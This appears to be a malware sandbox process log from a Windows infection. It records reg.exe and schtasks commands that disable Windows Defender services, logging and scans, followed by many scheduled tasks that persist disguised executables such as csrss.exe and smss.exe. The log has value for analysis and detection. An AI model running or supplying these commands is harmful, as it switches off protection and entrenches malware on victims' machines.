C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\ba13f242-3a65-11ef-94cb-d685e2345d05\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\L2Schemas\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default User\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\Help\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Help\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CbarT2SBYT.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\syYKg8QxNI.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8RIE4o2SCx.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QRlBHoY6P9.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gPrDhQDX5J.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1F0LTC0kP2.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fmTXnddwCX.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b7oBPqXqtO.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UucX7bnqC8.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FIx4sKIZfl.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EYKlAcFNfO.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\L9j9zErPDE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sPXGbYzrvf.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0P1AeAAEDQ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uuaNNDTqg5.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dgWvFyiHB2.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tebxeZNirC.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uxMZkGAiOs.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WVE2eLfZN7.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\C0VS1u4WCC.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jnfhf9Euk8.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wpigNgqS7W.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EtrZeLjFvq.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jkzlbVqk90.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iu0amT0ExO.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ww4YVzclJm.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vCRFnHZZKP.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QwDZd8tkMK.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IJ9EkrtYDM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qzxbGmHcY3.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eNTIt1NKYH.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UZ6jdsJyxg.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mw1PlbJmoj.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YwiSfj46e4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\f4KPDhjeqr.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8t4fMT0wY0.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KtkjGbmHOL.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T3kbcxG26A.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hfpeQ4JfvC.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2qVagYZlTM.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aWJwCUxpp4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jhJpXqSaXt.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xc1v93Hoh1.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ST975DOJvB.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ljju5cbnZy.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Wqkq749RcZ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Rn5V8mQYRH.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ay5NT8uJA6.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7etkz3INVn.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cOf3pucYXi.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SpZgFYZT4y.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q3ZRkRg4YZ.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wpigNgqS7W.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aJcBxrOCPY.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TmtjCtAJTq.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\N4rS0hE0df.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GQn77QEoUi.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q2cXKRfm9B.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\18eSMsDQCm.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\taskeng.exe

taskeng.exe {9F4EE8F7-AC11-4DE4-B14F-8C27A906E828} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GrfoiSU1wP.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2K3DLFE7WC.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\Idle.exe

"C:\Users\Default User\Idle.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\64IFTJQeKo.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Default User\System.exe

"C:\Users\Default User\System.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pkmftNZ3Wr.bat"

C:\Windows\system32\w32tm.exe
